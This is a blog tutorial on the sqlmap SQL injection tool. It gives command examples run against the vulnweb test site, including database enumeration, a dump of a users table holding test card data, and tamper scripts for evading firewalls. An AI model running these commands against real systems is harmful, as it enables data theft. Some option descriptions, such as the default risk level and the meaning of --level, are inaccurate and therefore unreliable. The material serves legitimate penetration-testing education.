SqlMap command in CyberSecurity | SQL Injection Attack Tool

hack-database-with-sqlmap-tool

In this blog, we will learn about the Sqlmap command tool, which is popular for use in the SQL Injection Tool. SqlMap provides great features compared with the other SQL Injection Tools. So let’s get started with the blog.

Introduction

SQLMap is an open-source penetration testing tool that automates the process of detecting and exploiting SQL injection vulnerabilities in web applications. It is specifically designed for testing the security of database-driven web applications.

SQLMap utilizes various techniques to identify and exploit SQL injection flaws.

It can perform tasks such as fingerprinting the database management system, extracting database schema information, dumping table entries, and even gaining command execution on the underlying operating system.

Features of SqlMap Tool

Here are some key features of SQLMap:

Automated detection:

SQLMap can automatically detect SQL injection vulnerabilities in web applications by analyzing request parameters and payloads.

Fingerprinting:

It can determine the type and version of the database management system used by the target application.

Database enumeration:

SQLMap can extract useful information from the database, such as database names, tables, columns, and user accounts.

Data extraction:

It can retrieve the contents of database tables and perform data dumps.

Privilege escalation:

SQLMap can attempt to escalate privileges within the database system, allowing the attacker to gain administrative access.

OS interaction:

It can execute operating system commands on the underlying server, enabling the attacker to interact with the host system.

Brute forcing:

SQLMap can perform brute force attacks to guess usernames and passwords in the database.

Exploitation modules:

It supports various exploitation techniques, including time-based blind SQL injection, stacked queries, and out-of-band techniques.

Advantages

Some of the advantages of SqlMap include:

Automatic detection of SQL injection vulnerabilities:

SqlMap automates the process of identifying SQL injection vulnerabilities in web applications. It analyzes the target application’s parameters and payloads to determine if they are vulnerable to SQL injection attacks.

Comprehensive SQL injection exploitation:

SqlMap goes beyond simply detecting SQL injection vulnerabilities. It provides a wide range of techniques and options to exploit these vulnerabilities, including retrieving data from databases, executing commands on the underlying operating system, and even gaining a command shell on the targeted server.

Support for various database management systems (DBMS):

SqlMap supports a wide range of database management systems, including MySQL, Oracle, PostgreSQL, Microsoft SQL Server, SQLite, and more. It adjusts its techniques and payloads based on the specific characteristics of the target DBMS, making it versatile and adaptable.

Automated fingerprinting and enumeration:

SqlMap can automatically fingerprint the database management system and enumerate the database structure, tables, columns, and other relevant information. This feature helps in understanding the database schema and assists in crafting specific SQL injection payloads.

Batch scanning and reporting:

SqlMap allows for batch scanning, where multiple URLs or parameters can be scanned simultaneously. It generates comprehensive reports detailing the vulnerabilities found, the exploitation process, and the retrieved data. These reports are useful for security audits and further analysis.

Customization and extensibility:

SqlMap provides extensive options for customization, allowing users to fine-tune the scanning process according to their requirements. It also supports plugins and scripts, which can be developed to enhance its functionality and address specific testing scenarios.

Active community support:

SqlMap has a large and active community of users and developers. This means that there are frequent updates, bug fixes, and new features being added to the tool. The community also provides support and resources for beginners and advanced users alike.

Education and awareness:

SqlMap is widely used as a teaching tool for understanding SQL injection attacks and their impact on web applications. It helps raise awareness among developers and security professionals about the importance of secure coding practices and proper input validation.

Disadvantages

Here are a few disadvantages to consider:

False positives and false negatives:

Like any automated security tool, SqlMap may generate false positives, identifying vulnerabilities that do not actually exist. Similarly, it can miss certain SQL injection vulnerabilities, leading to false negatives. It is important to manually verify the findings and perform additional testing to ensure accuracy.

Limited effectiveness against advanced evasion techniques:

Some advanced web application firewalls (WAFs) and security measures are designed to detect and prevent SQL injection attacks. SqlMap’s techniques might be detected by these security mechanisms, leading to blocked or ineffective exploitation attempts.

Potential for unintended consequences:

SqlMap has the potential to cause unintended consequences or disruptions to the target system. Exploiting vulnerabilities without proper authorization or understanding can lead to system crashes, data corruption, or unauthorized access. It is crucial to use SqlMap responsibly and with proper authorization.

Lack of support for certain edge cases:

While SqlMap supports a wide range of database management systems, there might be cases where it doesn’t fully support specific DBMS versions or features. This limitation can impact its effectiveness against certain targets or make it more challenging to exploit certain vulnerabilities.

Lack of real-time monitoring and feedback:

SqlMap’s scanning and exploitation processes are not real-time or interactive. It performs a series of predefined steps and generates a report at the end. This lack of real-time feedback can make it challenging to adapt and respond to dynamic web applications or complex scenarios that require manual intervention.

SqlMap Commands

Using the Test Vulneb Website for Sqlmap Command Test.

A) Techniques

SQLMap allows you to specify the injection technique to be used.

The -technique option provides different techniques like

B: Boolean.

E: Error-based.

U: Union Query Based.

S: Stack Queries.

T: Time-based Blind.

Q: Inline Queries.

Syntax:

--technique-"options"

Example:

$ sqlmap -u http://testphp.vulnweb.com/ --crawl=3 --technique="U" --batch

The above command will show the result of all the UNION Operator vulnerabilities due to we have used option U.

B) Crawl

It helps us to crawl the website to get additional URLs.

Syntax:

--crawl=depth

Examples:

$ sqlmap -u http://testphp.vulnweb.com/ --crawl=3

The above command will store the result in .csv format in the “.sqlmap” folder. The problem with this command is that we have to answer all the requests for the scan.

To prevent this you can also use the –batch option, it will automatically select the default answer of the question.

$ sqlmap -u http://testphp.vulnweb.com/ --crawl=3 --batch

C) Thread

The --threads option allows you to specify the number of threads to be used by SQLmap.

Note that the maximum number of threads you can use depends on your system’s capabilities, available resources, and network bandwidth.

It is recommended to start with a reasonable number of threads and adjust accordingly based on the performance and stability of your system.

By default, it is 1.

$ $ sqlmap -u http://testphp.vulnweb.com/ --crawl=3 --batch --thread 1

D) Risk

In SQLmap, the --risk option is used to specify the level of risk for the vulnerability tests performed during the scanning process. The risk level determines the aggressiveness of the SQL injection tests that SQLmap conducts.

$ sqlmap -u http://testphp.vulnweb.com/ --risk=1

Replace <risk_level> with a value between 1 and 3, where:

  • Risk Level 1: This is the lowest risk level. It performs basic SQL injection tests with fewer requests and less aggressive techniques. It is suitable for environments where there is a concern about causing disruptions or high server loads.
  • Risk Level 2: This is the default risk level. It performs more extensive SQL injection tests using a wider range of techniques and payloads. It is a balanced option that provides a good compromise between thoroughness and potential impact.
  • Risk Level 3: This is the highest risk level. It employs the most aggressive techniques and payloads to maximize the chances of identifying SQL injection vulnerabilities. It may generate a higher number of requests and potentially cause more load on the target server.

E) Level

In SQLmap, the --level option is used to specify the level of depth for the crawling and scanning process. The level determines how far SQLmap will traverse the website’s structure to discover additional URLs and perform tests.

Here’s how to use the --level option in the SQLmap command:

$ sqlmap -u http://testphp.vulnweb.com/ --level=1

Replace <crawling_level> with a value between 1 and 5, where:

  • Level 1: This is the lowest crawling level. SQLmap will only scan the target URL and its immediate links, without going deeper into the website’s structure.
  • Level 2: SQLmap will scan the target URL, its immediate links, and links found on those pages. It will go one level deeper into the website’s structure.
  • Level 3 to 5: SQLmap will perform increasingly deeper scans, going further into the website’s structure and following more links at each level.

Note: Using risk and level options simultaneously can be false or negative results.

F) Verbosity

In SQLmap, the --verbosity option is used to control the level of verbosity or detail in the output generated during the scanning process. This option allows you to specify how much information you want SQLmap to display.

Here’s how to use the --verbosity option in the SQLmap command:

$ sqlmap -u <target_URL> --verbosity=<verbosity_level>

Replace <verbosity_level> with a value between 0 and 3, where:

  • Level 0: This is the lowest verbosity level. Only critical information and errors are displayed in the output.
  • Level 1: This level provides more information than level 0, including warnings and additional details about the scanning process.
  • Level 2: This level is more verbose and provides extensive output, including details about requests, payloads, and test results.
  • Level 3: This is the highest verbosity level. It provides the most detailed output, including all HTTP requests and responses, as well as debugging information.

G) Enumeration

The enumeration in SQLmap refers to the process of identifying and extracting specific information from a database or web application through automated scanning.

A) See the Configuration of the Server

$ sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --current-user --current-db --hostname --batch


[12:00:45] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.1
[12:00:45] [INFO] fetching current user
[12:00:45] [WARNING] something went wrong with full UNION technique (could be because of limitation on retrieved number of entries)
[12:00:47] [INFO] retrieved: 'acuart@localhost'
current user: 'acuart@localhost'
[12:00:47] [INFO] fetching current database
[12:00:48] [INFO] retrieved: 'acuart'
current database: 'acuart'
[12:00:48] [INFO] fetching server hostname
[12:00:49] [INFO] retrieved: 'ip-10-0-0-222'
hostname: 'ip-10-0-0-222'

Here you can see all the configurations of a database.

B) To list all the databases on the server

To know all the databases of the server, you should use the –dbs option.

$ sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs

available databases [2]:
[*] acuart
[*] information_schema

C) To list all the tables in the database on the server.

$ sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables

[8 tables]
+-----------+
| artists   |
| carts     |
| categ     |
| featured  |
| guestbook |
| pictures  |
| products  |
| users  

Here, “acurat” is the database name

D) See all the data of a particular table

$ sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --T users --dump


[1 entry]
+---------------------+----------------------------------+------+-----------------+---------+-------+--------+-----------+
| cc                  | cart                             | pass | email           | phone   | uname | name   | address   |
+---------------------+----------------------------------+------+-----------------+---------+-------+--------+-----------+
| 1234-5678-2300-9000 | 36886fd3ea81cb38ff5c4cf1fb361aba | test | email@email.com | 2323345 | test  | Anjay  | 21 street |
+---------------------+----------------------------------+------+-----------------+---------+-------+--------+-----------+

E) To see the datatype of a column in a table

$ sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users --columns

[8 columns]
+---------+--------------+
| Column  | Type         |
+---------+--------------+
| name    | varchar(100) |
| address | mediumtext   |
| cart    | varchar(100) |
| cc      | varchar(100) |
| email   | varchar(100) |
| pass    | varchar(100) |
| phone   | varchar(100) |
| uname   | varchar(100) |
+---------+--------------+

F) To list all the data in the table

$ sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --dump-all

H) Output Directory

$ sqlmap -u http://testphp.vulnweb.com --crawl=3 --output-dir="/home/Downloads" --batch

This will store the result as per the user’s directory.

I) Headers

In SQLmap, the --headers option allows you to specify custom headers to be included in the HTTP requests sent during the scanning process.

This option is useful when you want to provide additional headers or modify existing headers to simulate specific requests or interact with the target server in a desired way

$ sqlmap -u <target_URL> --headers="Referer: http://example.com; User-Agent: MyCustomUserAgent" --v 4

J) User Agent


In SQLmap, the --user-agent option allows you to specify a custom User-Agent header in the HTTP requests sent during the scanning process.

The User-Agent header is a standard part of an HTTP request that identifies the client software or user agent making the request.

Here’s how to use the --user-agent option in the SQLmap command:

$ sqlmap -u <target_URL> --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36" -v 4

K) Tamper

In SQLmap, the --tamper option allows you to specify custom script files or modules that modify the SQL injection payloads sent by SQLmap.

These tamper scripts can help evade security defenses, modify payloads, or perform other transformations on the injected SQL queries.

Tamper scripts can modify SQL injection payloads in various ways, such as encoding characters, obfuscating queries, or bypassing WAF (Web Application Firewall) filters.

They allow you to customize the payloads sent by SQLmap to increase the chances of successful exploitation or bypassing security defenses.

To see all the tamper list

$ sqlmap --list-tampers

To use the tamper list:

$ sqlmap -u <target_URL> --tamper=<tamper_script>

Conclusion

It’s important to note that SQLMap should only be used on systems you have explicit permission to test, as it is a powerful tool that can cause damage if used improperly.

Always follow ethical guidelines and obtain proper authorization before conducting any security testing.

FAQ

What is the use of SqlMap Command?

SQLMap is an open-source penetration testing tool that automates the process of detecting and exploiting SQL injection vulnerabilities in web applications. It is specifically designed for testing the security of database-driven web applications.
SQLMap utilizes various techniques to identify and exploit SQL injection flaws.
It can perform tasks such as fingerprinting the database management system, extracting database schema information, dumping table entries, and even gaining command execution on the underlying operating system.

Recent Articles on Computer Networks

  1. Introduction to Computer Networking | What is Computer Network
  2. What are Topology & Types of Topology in Computer Network
  3. What is FootPrinting in Cyber Security and its Types, Purpose
  4. Introduction to Cloud Computing | What is Cloud Computing
  5. Distributed Shared Memory and its advantages and Disadvantages
  6. What is VPN? How doe VPN Work? What VPN should I use?
  7. What is an Internet and How the Internet Works
  8. What is a Website and How Does a Website or web work?
  9. Introduction to Virus and different types of Viruses in Computer
  10. What is TCP and its Types and What is TCP three-way Handshake
  11. What is UDP Protocol? How does it work and what are its advantages?
  12. What is an IP and its Functions, What is IPv4 and IPv6 Address
  13. What is MAC Address and its Types and Difference MAC vs IP
  14. What is ARP and its Types? How Does it Work and ARP Format
  15. Sessions and Cookies and the Difference Between Them
  16. What is ICMP Protocol and its Message Format?
  1. What is Linux Operating System | Introduction to Linux
  2. Directory in Linux Define | Linux Directory & its Commands
  3. Explain the chmod command in Linux | Linux chmod command
  4. Linux User Management || User Management in Linux
  5. Linux Computer Network Advanced Command | Network Command
  6. Redirection in Linux I/O| Linux I/O Redirection

By Vivek Maurya

Write blogs related to Ethical hacking, Computer networks, Linux, Penetration testing and Web3 Security.

Leave a Reply

Your email address will not be published. Required fields are marked *